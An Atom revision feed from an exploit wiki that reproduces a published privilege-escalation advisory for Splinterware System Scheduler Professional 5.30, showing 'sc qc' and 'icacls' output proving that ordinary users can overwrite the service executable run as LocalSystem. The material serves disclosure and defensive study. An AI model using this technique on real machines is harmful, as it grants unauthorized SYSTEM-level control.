<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Splinterware_System_Scheduler_Professional_5.30_%E7%89%B9%E6%AC%8A%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E</id>
	<title>Splinterware System Scheduler Professional 5.30 特權提升漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Splinterware_System_Scheduler_Professional_5.30_%E7%89%B9%E6%AC%8A%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Splinterware_System_Scheduler_Professional_5.30_%E7%89%B9%E6%AC%8A%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-10T08:16:18Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Splinterware_System_Scheduler_Professional_5.30_%E7%89%B9%E6%AC%8A%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E&amp;diff=2840&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: Splinterware System Scheduler Professional 5.30 - Privilege Escalation # Date: 2021-05-11 # Exploit Author: Andrea Intilangelo # Vendor Homepage...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Splinterware_System_Scheduler_Professional_5.30_%E7%89%B9%E6%AC%8A%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E&amp;diff=2840&amp;oldid=prev"/>
		<updated>2021-05-13T00:49:45Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: Splinterware System Scheduler Professional 5.30 - Privilege Escalation # Date: 2021-05-11 # Exploit Author: Andrea Intilangelo # Vendor Homepage...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Splinterware System Scheduler Professional 5.30 - Privilege Escalation&lt;br /&gt;
# Date: 2021-05-11&lt;br /&gt;
# Exploit Author: Andrea Intilangelo&lt;br /&gt;
# Vendor Homepage: https://www.splinterware.com&lt;br /&gt;
# Software Link: https://www.splinterware.com/download/ssproeval.exe&lt;br /&gt;
# Version: 5.30 Professional&lt;br /&gt;
# Tested on: Windows 10 Pro 20H2 x64&lt;br /&gt;
&lt;br /&gt;
System Scheduler Professional 5.30 is subject to privilege escalation due to insecure file permissions, impacting&lt;br /&gt;
where the service 'WindowsScheduler' calls its executable. A non-privileged user could execute arbitrary code with&lt;br /&gt;
elevated privileges (system level privileges as &amp;quot;nt authority\system&amp;quot;) since the service runs as Local System;&lt;br /&gt;
renaming the WService.exe file located in the software's path and replacing it with a malicious file, the new one&lt;br /&gt;
will be executed after a short while.&lt;br /&gt;
&lt;br /&gt;
C:\Users\test&amp;gt;sc qc WindowsScheduler&lt;br /&gt;
[SC] QueryServiceConfig OPERAZIONI RIUSCITE&lt;br /&gt;
&lt;br /&gt;
NOME_SERVIZIO: WindowsScheduler&lt;br /&gt;
        TIPO                      : 10  WIN32_OWN_PROCESS&lt;br /&gt;
        TIPO_AVVIO                : 2   AUTO_START&lt;br /&gt;
        CONTROLLO_ERRORE          : 0   IGNORE&lt;br /&gt;
        NOME_PERCORSO_BINARIO     : C:\PROGRA~2\SYSTEM~1\WService.exe&lt;br /&gt;
        GRUPPO_ORDINE_CARICAMENTO :&lt;br /&gt;
        TAG                       : 0&lt;br /&gt;
        NOME_VISUALIZZATO         : System Scheduler Service&lt;br /&gt;
        DIPENDENZE                :&lt;br /&gt;
        SERVICE_START_NAME : LocalSystem&lt;br /&gt;
&lt;br /&gt;
C:\Users\test&amp;gt;icacls C:\PROGRA~2\SYSTEM~1\&lt;br /&gt;
C:\PROGRA~2\SYSTEM~1\ BUILTIN\Users:(RX,W)&lt;br /&gt;
                      BUILTIN\Users:(OI)(CI)(IO)(GR,GW,GE)&lt;br /&gt;
                      NT SERVICE\TrustedInstaller:(I)(F)&lt;br /&gt;
                      NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)&lt;br /&gt;
                      NT AUTHORITY\SYSTEM:(I)(F)&lt;br /&gt;
                      NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)&lt;br /&gt;
                      BUILTIN\Administrators:(I)(F)&lt;br /&gt;
                      BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)&lt;br /&gt;
                      BUILTIN\Users:(I)(RX)&lt;br /&gt;
                      BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)&lt;br /&gt;
                      CREATOR OWNER:(I)(OI)(CI)(IO)(F)&lt;br /&gt;
                      AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(RX)&lt;br /&gt;
                      AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(OI)(CI)(IO)(GR,GE)&lt;br /&gt;
                      AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX)&lt;br /&gt;
                      AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(OI)(CI)(IO)(GR,GE)&lt;br /&gt;
&lt;br /&gt;
Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file&lt;br /&gt;
&lt;br /&gt;
C:\Users\test&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>